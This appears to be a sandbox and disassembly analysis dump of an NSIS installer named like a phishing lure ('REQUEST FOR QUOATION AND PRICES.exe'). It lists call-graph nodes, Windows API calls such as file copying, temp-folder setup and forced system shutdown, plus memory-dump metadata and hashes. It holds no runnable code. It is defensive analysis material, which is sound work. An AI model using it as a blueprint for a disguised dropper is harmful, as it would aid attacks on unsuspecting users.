4022->4026 4023->4019 4032 405875 4023->4032 4057 405eea lstrcpynW 4023->4057 4024->4009 4025->4004 4029 405194 25 API calls 4025->4029 4028 405194 25 API calls 4026->4028 4028->4004 4031 40591d 4029->4031 4030 405772 64 API calls 4030->4032 4034 405d84 40 API calls 4031->4034 4032->4019 4032->4030 4033 405194 25 API calls 4032->4033 4058 40572a 4032->4058 4066 405194 4032->4066 4077 405d84 4032->4077 4033->4019 4036 405924 4034->4036 4036->4004 4088 405eea lstrcpynW 4038->4088 4040 405a4e 4089 4059e0 CharNextW CharNextW 4040->4089 4043 405792 4043->4002 4043->4003 4044 40617e 5 API calls 4050 405a64 4044->4050 4045 405a95 lstrlenW 4046 405aa0 4045->4046 4045->4050 4048 405935 3 API calls 4046->4048 4047 40622d 2 API calls 4047->4050 4049 405aa5 GetFileAttributesW 4048->4049 4049->4043 4050->4043 4050->4045 4050->4047 4051 405981 2 API calls 4050->4051 4051->4045 4052->4006 4054 40598f 4053->4054 4055 4059a1 4054->4055 4056 405995 CharPrevW 4054->4056 4055->4011 4056->4054 4056->4055 4057->4023 4095 405b31 GetFileAttributesW 4058->4095 4061 405745 RemoveDirectoryW 4063 405753 4061->4063 4062 40574d DeleteFileW 4062->4063 4064 405757 4063->4064 4065 405763 SetFileAttributesW 4063->4065 4064->4032 4065->4064 4067 405251 4066->4067 4068 4051af 4066->4068 4067->4032 4069 4051cb lstrlenW 4068->4069 4070 405f0c 18 API calls 4068->4070 4071 4051f4 4069->4071 4072 4051d9 lstrlenW 4069->4072 4070->4069 4074 405207 4071->4074 4075 4051fa SetWindowTextW 4071->4075 4072->4067 4073 4051eb lstrcatW 4072->4073 4073->4071 4074->4067 4076 40520d SendMessageW SendMessageW SendMessageW 4074->4076 4075->4074 4076->4067 4098 406254 GetModuleHandleA 4077->4098 4081 405dac 4081->4032 4083 406243 FindClose 4082->4083 4084 4058f6 4082->4084 4083->4084 4084->4004 4084->4016 4086 405951 lstrcatW 4085->4086 4087 405900 4085->4087 4086->4087 4087->4020 4088->4040 4090 4059fd 4089->4090 4092 405a0f 4089->4092 4091 405a0a CharNextW 4090->4091 4090->4092 4094 405a33 4091->4094 4093 405962 CharNextW 4092->4093 4092->4094 4093->4092 4094->4043 4094->4044 4096 405736 4095->4096 4097 405b43 SetFileAttributesW 4095->4097 4096->4061 4096->4062 4096->4064 4097->4096 4099 406270 LoadLibraryA 4098->4099 4100 40627b GetProcAddress 4098->4100 4099->4100 4101 405d8b 4099->4101 4100->4101 4101->4081 4102 405c08 lstrcpyW 4101->4102 4103 405c31 4102->4103 4104 405c57 GetShortPathNameW 4102->4104 4127 405b56 GetFileAttributesW CreateFileW 4103->4127 4105 405c6c 4104->4105 4106 405d7e 4104->4106 4105->4106 4108 405c74 wsprintfA 4105->4108 4106->4081 4111 405f0c 18 API calls 4108->4111 4109 405c3b CloseHandle GetShortPathNameW 4109->4106 4110 405c4f 4109->4110 4110->4104 4110->4106 4112 405c9c 4111->4112 4128 405b56 GetFileAttributesW CreateFileW 4112->4128 4114 405ca9 4114->4106 4115 405cb8 GetFileSize GlobalAlloc 4114->4115 4116 405d77 CloseHandle 4115->4116 4117 405cda 4115->4117 4116->4106 4129 405bd9 ReadFile 4117->4129 4122 405cf9 lstrcpyA 4125 405d1b 4122->4125 4123 405d0d 4124 405abb 4 API calls 4123->4124 4124->4125 4126 405d52 SetFilePointer WriteFile GlobalFree 4125->4126 4126->4116 4127->4109 4128->4114 4130 405bf7 4129->4130 4130->4116 4131 405abb lstrlenA 4130->4131 4132 405afc lstrlenA 4131->4132 4133 405b04 4132->4133 4134 405ad5 lstrcmpiA 4132->4134 4133->4122 4133->4123 4134->4133 4135 405af3 CharNextA 4134->4135 4135->4132 5565 402224 5566 40223e 5565->5566 5567 40222b 5565->5567 5568 405f0c 18 API calls 5567->5568 5569 402238 5568->5569 5570 4056c6 MessageBoxIndirectW 5569->5570 5570->5566 5571 10001667 5572 1000152e 4 API calls 5571->5572 5575 1000167f 5572->5575 5573 100016c5 GlobalFree 5574 1000169a 5574->5573 5575->5573 5575->5574 5576 100016b1 VirtualFree 5575->5576 5576->5573 5577 402729 5578 402730 5577->5578 5579 4029c7 5577->5579 5580 402736 FindClose 5578->5580 5580->5579 5581 401cab 5582 402b1d 18 API calls 5581->5582 5583 401cb2 5582->5583 5584 402b1d 18 API calls 5583->5584 5585 401cba GetDlgItem 5584->5585 5586 4024e8 5585->5586 5587 4016af 5588 402b3a 18 API calls 5587->5588 5589 4016b5 GetFullPathNameW 5588->5589 5590 4016cf 5589->5590 5596 4016f1 5589->5596 5593 40622d 2 API calls 5590->5593 5590->5596 5591 401706 GetShortPathNameW 5592 4029c7 5591->5592 5594 4016e1 5593->5594 5594->5596 5597 405eea lstrcpynW 5594->5597 5596->5591 5596->5592 5597->5596 4319 402331 4320 402337 4319->4320 4321 402b3a 18 API calls 4320->4321 4322 402349 4321->4322 4323 402b3a 18 API calls 4322->4323 4324 402353 RegCreateKeyExW 4323->4324 4325 402793 4324->4325 4326 40237d 4324->4326 4327 402398 4326->4327 4328 402b3a 18 API calls 4326->4328 4329 4023a4 4327->4329 4331 402b1d 18 API calls 4327->4331 4330 40238e lstrlenW 4328->4330 4332 4023bf RegSetValueExW 4329->4332 4336 403062 4329->4336 4330->4327 4331->4329 4333 4023d5 RegCloseKey 4332->4333 4333->4325 4337 403072 SetFilePointer 4336->4337 4338 40308e 4336->4338 4337->4338 4351 40317d GetTickCount 4338->4351 4341 405bd9 ReadFile 4342 4030ae 4341->4342 4343 40317d 43 API calls 4342->4343 4347 403139 4342->4347 4344 4030c5 4343->4344 4345 40313f ReadFile 4344->4345 4344->4347 4348 4030d5 4344->4348 4345->4347 4347->4332 4348->4347 4349 405bd9 ReadFile 4348->4349 4350 403108 WriteFile 4348->4350 4349->4348 4350->4347 4350->4348 4352 4032e7 4351->4352 4353 4031ac 4351->4353 4354 402d1a 33 API calls 4352->4354 4364 40330f SetFilePointer 4353->4364 4360 403095 4354->4360 4356 4031b7 SetFilePointer 4362 4031dc 4356->4362 4360->4341 4360->4347 4361 403271 WriteFile 4361->4360 4361->4362 4362->4360 4362->4361 4363 4032c8 SetFilePointer 4362->4363 4365 4032f9 4362->4365 4368 406390 4362->4368 4375 402d1a 4362->4375 4363->4352 4364->4356 4366 405bd9 ReadFile 4365->4366 4367 40330c 4366->4367 4367->4362 4369 4063b5 4368->4369 4370 4063bd 4368->4370 4369->4362 4370->4369 4371 406444 GlobalFree 4370->4371 4372 40644d GlobalAlloc 4370->4372 4373 4064c4 GlobalAlloc 4370->4373 4374 4064bb GlobalFree 4370->4374 4371->4372 4372->4369 4372->4370 4373->4369 4373->4370 4374->4373 4376 402d43 4375->4376 4377 402d2b 4375->4377 4379 402d53 GetTickCount 4376->4379 4380 402d4b 4376->4380 4378 402d34 DestroyWindow 4377->4378 4383 402d3b 4377->4383 4378->4383 4382 402d61 4379->4382 4379->4383 4381 40628d 2 API calls 4380->4381 4381->4383 4384 402d96 CreateDialogParamW ShowWindow 4382->4384 4385 402d69 4382->4385 4383->4362 4384->4383 4385->4383 4390 402cfe 4385->4390 4387 402d77 wsprintfW 4388 405194 25 API calls 4387->4388 4389 402d94 4388->4389 4389->4383 4391 402d0d 4390->4391 4392 402d0f MulDiv 4390->4392 4391->4392 4392->4387 5605 4027b5 5606 402b3a 18 API calls 5605->5606 5607 4027c3 5606->5607 5608 4027d9 5607->5608 5609 402b3a 18 API calls 5607->5609 5610 405b31 2 API calls 5608->5610 5609->5608 5611 4027df 5610->5611 5631 405b56 GetFileAttributesW CreateFileW 5611->5631 5613 4027ec 5614 402895 5613->5614 5615 4027f8 GlobalAlloc 5613->5615 5618 4028b0 5614->5618 5619 40289d DeleteFileW 5614->5619 5616 402811 5615->5616 5617 40288c CloseHandle 5615->5617 5632 40330f SetFilePointer 5616->5632 5617->5614 5619->5618 5621 402817 5622 4032f9 ReadFile 5621->5622 5623 402820 GlobalAlloc 5622->5623 5624 402830 5623->5624 5625 402864 WriteFile GlobalFree 5623->5625 5627 403062 46 API calls 5624->5627 5626 403062 46 API calls 5625->5626 5628 402889 5626->5628 5630 40283d 5627->5630 5628->5617 5629 40285b GlobalFree 5629->5625 5630->5629 5631->5613 5632->5621 5633 4028b6 5634 402b1d 18 API calls 5633->5634 5635 4028bc 5634->5635 5636 4028f8 5635->5636 5637 4028df 5635->5637 5643 402793 5635->5643 5639 402902 5636->5639 5640 40290e 5636->5640 5638 4028e4 5637->5638 5646 4028f5 5637->5646 5647 405eea lstrcpynW 5638->5647 5641 402b1d 18 API calls 5639->5641 5642 405f0c 18 API calls 5640->5642 5641->5646 5642->5646 5646->5643 5648 405e31 wsprintfW 5646->5648 5647->5643 5648->5643 5649 4014b8 5650 4014be 5649->5650 5651 401389 2 API calls 5650->5651 5652 4014c6 5651->5652 4742 4015b9 4743 402b3a 18 API calls 4742->4743 4744 4015c0 4743->4744 4745 4059e0 4 API calls 4744->4745 4756 4015c9 4745->4756 4746 401614 4748 401646 4746->4748 4749 401619 4746->4749 4747 405962 CharNextW 4750 4015d7 CreateDirectoryW 4747->4750 4753 401423 25 API calls 4748->4753 4751 401423 25 API calls 4749->4751 4752 4015ed GetLastError 4750->4752 4750->4756 4754 401620 4751->4754 4752->4756 4757 4015fa GetFileAttributesW 4752->4757 4759 40163e 4753->4759 4760 405eea lstrcpynW 4754->4760 4756->4746 4756->4747 4757->4756 4758 40162d SetCurrentDirectoryW 4758->4759 4760->4758 5653 401939 5654 402b3a 18 API calls 5653->5654 5655 401940 lstrlenW 5654->5655 5656 4024e8 5655->5656 5657 40293b 5658 402b1d 18 API calls 5657->5658 5659 402941 5658->5659 5660 402974 5659->5660 5661 402793 5659->5661 5663 40294f 5659->5663 5660->5661 5662 405f0c 18 API calls 5660->5662 5662->5661 5663->5661 5665 405e31 wsprintfW 5663->5665 5665->5661 4974 40173f 4975 402b3a 18 API calls 4974->4975 4976 401746 4975->4976 4977 405b85 2 API calls 4976->4977 4978 40174d 4977->4978 4979 405b85 2 API calls 4978->4979 4979->4978 5666 40653f 5672 4063c3 5666->5672 5667 406d2e 5668 406444 GlobalFree 5669 40644d GlobalAlloc 5668->5669 5669->5667 5669->5672 5670 4064c4 GlobalAlloc 5670->5667 5670->5672 5671 4064bb GlobalFree 5671->5670 5672->5667 5672->5668 5672->5669 5672->5670 5672->5671

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 0 40335a-4033f0 #17 SetErrorMode OleInitialize call 406254 SHGetFileInfoW call 405eea GetCommandLineW call 405eea GetModuleHandleW 7 4033f2-4033f9 0->7 8 4033fa-40340c call 405962 CharNextW 0->8 7->8 11 4034da-4034e0 8->11 12 403411-403417 11->12 13 4034e6 11->13 14 403420-403426 12->14 15 403419-40341e 12->15 16 4034fa-403514 GetTempPathW call 403326 13->16 18 403428-40342c 14->18 19 40342d-403431 14->19 15->14 15->15 23 403516-403534 GetWindowsDirectoryW lstrcatW call 403326 16->23 24 40356c-403586 DeleteFileW call 402dbc 16->24 18->19 21 403437-40343d 19->21 22 4034cb-4034d6 call 405962 19->22 26 403457-40346e 21->26 27 40343f-403446 21->27 22->11 39 4034d8-4034d9 22->39 23->24 42 403536-403566 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403326 23->42 44 40361c-40362b call 4037c2 OleUninitialize 24->44 45 40358c-403592 24->45 30 403470-403486 26->30 31 40349c-4034b2 26->31 28 403448-40344b 27->28 29 40344d 27->29 28->26 28->29 29->26 30->31 35 403488-403490 30->35 31->22 37 4034b4-4034c9 31->37 40 403492-403495 35->40 41 403497 35->41 37->22 43 4034e8-4034f5 call 405eea 37->43 39->11 40->31 40->41 41->31 42->24 42->44 43->16 57 403631-403641 call 4056c6 ExitProcess 44->57 58 403727-40372d 44->58 49 403594-40359f call 405962 45->49 50 40360c-403613 call 4038b4 45->50 59 4035a1-4035b2 49->59 60 4035d6-4035e0 49->60 56 403618 50->56 56->44 62 4037aa-4037b2 58->62 63 40372f-40374c call 406254 * 3 58->63 65 4035b4-4035b6 59->65 68 4035e2-4035f0 call 405a3d 60->68 69 403647-403661 lstrcatW lstrcmpiW 60->69 66 4037b4 62->66 67 4037b8-4037bc ExitProcess 62->67 90 403796-4037a1 ExitWindowsEx 63->90 91 40374e-403750 63->91 72 4035d0-4035d4 65->72 73 4035b8-4035ce 65->73 66->67 68->44 81 4035f2-403608 call 405eea * 2 68->81 69->44 75 403663-403679 CreateDirectoryW SetCurrentDirectoryW 69->75 72->60 72->65 73->60 73->72 78 403686-4036af call 405eea 75->78 79 40367b-403681 call 405eea 75->79 89 4036b4-4036d0 call 405f0c DeleteFileW 78->89 79->78 81->50 99 403711-403719 89->99 100 4036d2-4036e2 CopyFileW 89->100 90->62 94 4037a3-4037a5 call 40140b 90->94 91->90 96 403752-403754 91->96 94->62 96->90 101 403756-403768 GetCurrentProcess 96->101 99->89 103 40371b-403722 call 405d84 99->103 100->99 102 4036e4-403704 call 405d84 call 405f0c call 405665 100->102 101->90 108 40376a-40378c 101->108 102->99 115 403706-40370d CloseHandle 102->115 103->44 108->90 115->99
                                                                                                                                APIs
                                                                                                                                • #17.COMCTL32 ref: 00403379
                                                                                                                                • SetErrorMode.KERNELBASE(00008001), ref: 00403384
                                                                                                                                • OleInitialize.OLE32(00000000), ref: 0040338B
                                                                                                                                  • Part of subcall function 00406254: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000008), ref: 00406266
                                                                                                                                  • Part of subcall function 00406254: LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000008), ref: 00406271
                                                                                                                                  • Part of subcall function 00406254: GetProcAddress.KERNEL32(00000000,?), ref: 00406282
                                                                                                                                • SHGetFileInfoW.SHELL32(00420690,00000000,?,000002B4,00000000), ref: 004033B3
                                                                                                                                  • Part of subcall function 00405EEA: lstrcpynW.KERNEL32(?,?,00000400,004033C8,004281E0,NSIS Error), ref: 00405EF7
                                                                                                                                • GetCommandLineW.KERNEL32(004281E0,NSIS Error), ref: 004033C8
                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe",00000000), ref: 004033DB
                                                                                                                                • CharNextW.USER32(00000000,"C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe",00000020), ref: 00403402
                                                                                                                                • GetTempPathW.KERNEL32(00000400,C:\Users\user~1\AppData\Local\Temp\,00000000,00000020), ref: 0040350B
                                                                                                                                • GetWindowsDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,000003FB), ref: 0040351C
                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 00403528
                                                                                                                                • GetTempPathW.KERNEL32(000003FC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 0040353C
                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,Low), ref: 00403544
                                                                                                                                • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,Low), ref: 00403555
                                                                                                                                • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user~1\AppData\Local\Temp\), ref: 0040355D
                                                                                                                                • DeleteFileW.KERNELBASE(1033), ref: 00403571
                                                                                                                                • OleUninitialize.OLE32(?), ref: 00403621
                                                                                                                                • ExitProcess.KERNEL32 ref: 00403641
                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe",00000000,?), ref: 0040364D
                                                                                                                                • lstrcmpiW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user~1\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe",00000000,?), ref: 00403659
                                                                                                                                • CreateDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00403665
                                                                                                                                • SetCurrentDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\), ref: 0040366C
                                                                                                                                • DeleteFileW.KERNEL32(0041FE90,0041FE90,?,0042A000,?), ref: 004036C6
                                                                                                                                • CopyFileW.KERNEL32(C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe,0041FE90,00000001), ref: 004036DA
                                                                                                                                • CloseHandle.KERNEL32(00000000,0041FE90,0041FE90,?,0041FE90,00000000), ref: 00403707
                                                                                                                                • GetCurrentProcess.KERNEL32(00000028,00000004,00000005,00000004,00000003), ref: 0040375D
                                                                                                                                • ExitWindowsEx.USER32(00000002,00000000), ref: 00403799
                                                                                                                                • ExitProcess.KERNEL32 ref: 004037BC
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1640186672.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1640172757.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640203031.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000045D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                                                                                                • String ID: "C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe"$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet$C:\Users\user\Desktop$C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                                                                                                • API String ID: 4107622049-1632176514
                                                                                                                                • Opcode ID: 19452a82f84b89d672e287bbd9b4a7210e15b48e73439f139737dd6fa92c6ca7
                                                                                                                                • Instruction ID: adac61535fb2ab45c93a94ea6b46826cba801cc8f349b6914fd9ce0ca4797ca8
                                                                                                                                • Opcode Fuzzy Hash: 19452a82f84b89d672e287bbd9b4a7210e15b48e73439f139737dd6fa92c6ca7
                                                                                                                                • Instruction Fuzzy Hash: 72B1C170904211AAD720BF619D49A3B3EACEB4570AF40453FF542BA2E2D77C9941CB7E

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 116 404b10-404b5c GetDlgItem * 2 117 404b62-404bf6 GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 116->117 118 404d7d-404d84 116->118 119 404c05-404c0c DeleteObject 117->119 120 404bf8-404c03 SendMessageW 117->120 121 404d86-404d96 118->121 122 404d98 118->122 124 404c0e-404c16 119->124 120->119 123 404d9b-404da4 121->123 122->123 125 404da6-404da9 123->125 126 404daf-404db5 123->126 127 404c18-404c1b 124->127 128 404c3f-404c43 124->128 125->126 130 404e93-404e9a 125->130 133 404dc4-404dcb 126->133 134 404db7-404dbe 126->134 131 404c20-404c3d call 405f0c SendMessageW * 2 127->131 132 404c1d 127->132 128->124 129 404c45-404c71 call 40412f * 2 128->129 172 404c77-404c7d 129->172 173 404d3c-404d4f GetWindowLongW SetWindowLongW 129->173 138 404f0b-404f13 130->138 139 404e9c-404ea2 130->139 131->128 132->131 135 404e40-404e43 133->135 136 404dcd-404dd0 133->136 134->130 134->133 135->130 149 404e45-404e4f 135->149 144 404dd2-404dd9 136->144 145 404ddb-404df0 call 404a5e 136->145 141 404f15-404f1b SendMessageW 138->141 142 404f1d-404f24 138->142 147 4050f3-405105 call 404196 139->147 148 404ea8-404eb2 139->148 141->142 152 404f26-404f2d 142->152 153 404f58-404f5f 142->153 144->135 144->145 145->135 171 404df2-404e03 145->171 148->147 156 404eb8-404ec7 SendMessageW 148->156 150 404e51-404e5d SendMessageW 149->150 151 404e5f-404e69 149->151 150->151 151->130 159 404e6b-404e75 151->159 160 404f36-404f3d 152->160 161 404f2f-404f30 ImageList_Destroy 152->161 164 4050b5-4050bc 153->164 165 404f65-404f71 call 4011ef 153->165 156->147 166 404ecd-404ede SendMessageW 156->166 167 404e86-404e90 159->167 168 404e77-404e84 159->168 169 404f46-404f52 160->169 170 404f3f-404f40 GlobalFree 160->170 161->160 164->147 177 4050be-4050c5 164->177 190 404f81-404f84 165->190 191 404f73-404f76 165->191 175 404ee0-404ee6 166->175 176 404ee8-404eea 166->176 167->130 168->130 169->153 170->169 171->135 179 404e05-404e07 171->179 180 404c80-404c87 172->180 178 404d55-404d59 173->178 175->176 182 404eeb-404f04 call 401299 SendMessageW 175->182 176->182 177->147 183 4050c7-4050f1 ShowWindow GetDlgItem ShowWindow 177->183 184 404d73-404d7b call 404164 178->184 185 404d5b-404d6e ShowWindow call 404164 178->185 186 404e09-404e10 179->186 187 404e1a 179->187 188 404d1d-404d30 180->188 189 404c8d-404cb5 180->189 182->138 183->147 184->118 185->147 197 404e12-404e14 186->197 198 404e16-404e18 186->198 201 404e1d-404e39 call 40117d 187->201 188->180 205 404d36-404d3a 188->205 199 404cb7-404ced SendMessageW 189->199 200 404cef-404cf1 189->200 193 404fc5-404fe9 call 4011ef 190->193 194 404f86-404f9f call 4012e2 call 401299 190->194 202 404f78 191->202 203 404f79-404f7c call 404ade 191->203 218 40508b-40509f InvalidateRect 193->218 219 404fef 193->219 224 404fa1-404fa7 194->224 225 404faf-404fbe SendMessageW 194->225 197->201 198->201 199->188 206 404cf3-404d02 SendMessageW 200->206 207 404d04-404d1a SendMessageW 200->207 201->135 202->203 203->190 205->173 205->178 206->188 207->188 218->164 221 4050a1-4050b0 call 404a31 call 404978 218->221 222 404ff2-404ffd 219->222 221->164 226 405073-405085 222->226 227 404fff-40500e 222->227 228 404fa9 224->228 229 404faa-404fad 224->229 225->193 226->218 226->222 231 405010-40501d 227->231 232 405021-405024 227->232 228->229 229->224 229->225 231->232 233 405026-405029 232->233 234 40502b-405034 232->234 236 405039-405071 SendMessageW * 2 233->236 234->236 237 405036 234->237 236->226 237->236
                                                                                                                                APIs
                                                                                                                                • GetDlgItem.USER32(?,000003F9), ref: 00404B28
                                                                                                                                • GetDlgItem.USER32(?,00000408), ref: 00404B33
                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B7D
                                                                                                                                • LoadBitmapW.USER32(0000006E), ref: 00404B90
                                                                                                                                • SetWindowLongW.USER32(?,000000FC,00405108), ref: 00404BA9
                                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BBD
                                                                                                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BCF
                                                                                                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404BE5
                                                                                                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BF1
                                                                                                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C03
                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00404C06
                                                                                                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C31
                                                                                                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C3D
                                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CD3
                                                                                                                                • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CFE
                                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D12
                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404D41
                                                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D4F
                                                                                                                                • ShowWindow.USER32(?,00000005), ref: 00404D60
                                                                                                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E5D
                                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EC2
                                                                                                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404ED7
                                                                                                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EFB
                                                                                                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F1B
                                                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 00404F30
                                                                                                                                • GlobalFree.KERNEL32(?), ref: 00404F40
                                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FB9
                                                                                                                                • SendMessageW.USER32(?,00001102,?,?), ref: 00405062
                                                                                                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405071
                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00405091
                                                                                                                                • ShowWindow.USER32(?,00000000), ref: 004050DF
                                                                                                                                • GetDlgItem.USER32(?,000003FE), ref: 004050EA
                                                                                                                                • ShowWindow.USER32(00000000), ref: 004050F1
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1640186672.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1640172757.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640203031.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000045D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                • String ID: $M$N
                                                                                                                                • API String ID: 1638840714-813528018
                                                                                                                                • Opcode ID: db08064a331c8b710d2bfbefb5f5365b1a6743964771edbed48d05eba51cbb05
                                                                                                                                • Instruction ID: d71a5cbf05b966a5fca8a5aa47d1df2e6c399d67ef135bcf6f64f468dd7cdb7f
                                                                                                                                • Opcode Fuzzy Hash: db08064a331c8b710d2bfbefb5f5365b1a6743964771edbed48d05eba51cbb05
                                                                                                                                • Instruction Fuzzy Hash: 6E027FB0900209EFEB209F54DD85AAE7BB5FB84314F10857AF610BA2E0D7799D52CF58

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
